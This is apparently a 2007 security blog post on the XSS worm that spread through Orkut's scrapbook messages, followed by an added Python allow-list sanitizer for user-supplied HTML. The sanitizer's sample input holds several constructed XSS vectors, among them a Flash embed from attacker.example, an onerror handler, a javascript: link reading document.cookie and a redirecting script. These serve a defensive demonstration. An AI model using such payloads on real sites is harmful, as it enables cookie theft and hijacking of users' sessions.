XSS worm hits Orkut

Written by KF

Thursday, 20 December 2007

Update: We noticed that an older vulnerability still works; had the worm been malicious, it could have combined the two vulnerabilities. Fortunately it wasn't. Check: . Orkut published an article on their blog about the attack:

Yesterday, an XSS worm hit Orkut, the well-known social networking website owned by Google.
According to several reports, the persistent XSS (script insertion) was found in the HTML messages feature of the "Scrapbook" page, which lets members leave messages on someone else's profile. Fortunately the discoverer, a Brazilian named Rodrigo Lacerda, used the XSS to propagate a "harmless" worm: it sent further "scraps" to the scrapbooks of all of the victim's contacts and joined them to the community "Infectados pelo Vírus do Orkut" ("Infected by the Orkut Virus"), which peaked at over 650,000 members. The scraps contained a Flash file that loaded JavaScript from a third-party site, infecting anybody who viewed the scrap. The following message was also left on the scrapbook:

"Feliz natal para vc!
Tenha uma otima semana =)
2008 vem ai... que ele comece mto bem para vc
Boas festas de final de ano"

(In English: "Merry Christmas to you! / Have a great week =) / 2008 is coming... may it start really well for you / Happy end-of-year holidays")
Orkut fixed the vulnerability earlier today. This incident shows once again how important web application security is and how dangerous XSS vulnerabilities can be, in particular when a feature accepts user-supplied HTML: a persistent payload is delivered to every viewer, and a self-propagating one reaches their contacts too. We are sure this is only one of the first incidents in what will become a long list over the coming years.
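As an added example, not Orkut's code (the reports say nothing about how Orkut's original filter worked), the following Python allow-list sanitizer shows the design an HTML message feature like the scrapbook needs: keep a short allow-list of tags and attributes, drop everything else (notably `<embed>`/`<object>`, since a Flash movie can call back into the page's JavaScript), and accept only absolute http(s) URLs. The sample scrap is constructed for this example; the greeting text is the one the worm left, while the embed, the host `attacker.example`, and the other vectors are assumptions and not the real payload.

```python
"""Allow-list sanitizer for an HTML message field such as Orkut's scrapbook.

Added example; this is not Orkut's code and the incident report gives no
detail of the original filter. It demonstrates the defence the incident
calls for: keep a short allow-list of tags and attributes and drop
everything else, in particular <embed>/<object> (a Flash movie can call
back into the page's JavaScript) and any URL whose scheme is not http(s).
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}
VOID_TAGS = {"br", "img"}
SWALLOW_TAGS = {"script", "style"}  # element *and* its text are removed


def safe_url(value):
    """Accept only absolute http(s) URLs; rejects javascript:, data:, vbscript: and relative tricks."""
    parts = urlsplit(value.strip())
    return parts.scheme.lower() in SAFE_SCHEMES and bool(parts.netloc)


class ScrapSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []         # sanitized fragments
        self.stack = []       # allowed tags still open, keeps the output balanced
        self.dropped = []     # tags removed, useful for logging and abuse detection
        self._swallow = None  # set while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in SWALLOW_TAGS:
            self._swallow = tag
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            # <embed>, <object>, <iframe>, <param>, ...: the element goes, its text stays
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:  # HTMLParser already lowercases attribute names
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onerror=, onload=, style=, allowscriptaccess=, ...
            if name in URL_ATTRS and not safe_url(value or ""):
                continue  # drops javascript: and data: URLs
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if self._swallow:
            if tag == self._swallow:
                self._swallow = None
            return
        if tag in self.stack:
            # close anything left open inside this element, then the element itself
            while True:
                inner = self.stack.pop()
                self.out.append("</%s>" % inner)
                if inner == tag:
                    break

    def handle_data(self, data):
        if not self._swallow:
            self.out.append(escape(data))  # text is re-escaped, never passed through raw

    def result(self):
        while self.stack:
            self.out.append("</%s>" % self.stack.pop())
        return "".join(self.out)


def sanitize_scrap(html):
    """Return (clean_html, dropped_tags) for an untrusted scrap."""
    p = ScrapSanitizer()
    p.feed(html)
    p.close()
    return p.result(), p.dropped


# Constructed sample scrap (not the real worm payload): the worm's greeting
# carrying a Flash embed that would load script from a third-party host
# (attacker.example is an assumed name), plus three other vectors that a
# tag blacklist tends to miss.
SAMPLE_SCRAP = (
    "<p>Feliz natal para vc! <b>Boas festas</b></p>"
    '<embed src="http://attacker.example/worm.swf" allowScriptAccess="always"></embed>'
    '<img src="x" onerror="alert(1)">'
    '<a href="javascript:alert(document.cookie)">click</a>'
    '<script>document.location="http://attacker.example/"</script>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_scrap(SAMPLE_SCRAP)
    print(clean)
    print("dropped:", dropped)
```

Run stand-alone, the sample reduces to `<p>Feliz natal para vc! <b>Boas festas</b></p><img><a>click</a>` with `embed` and `script` reported as dropped. The point of the allow-list is that the Flash embed never has to be recognised as dangerous: anything not explicitly permitted is removed, and an `href` or `src` survives only when it parses as an absolute http(s) URL.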
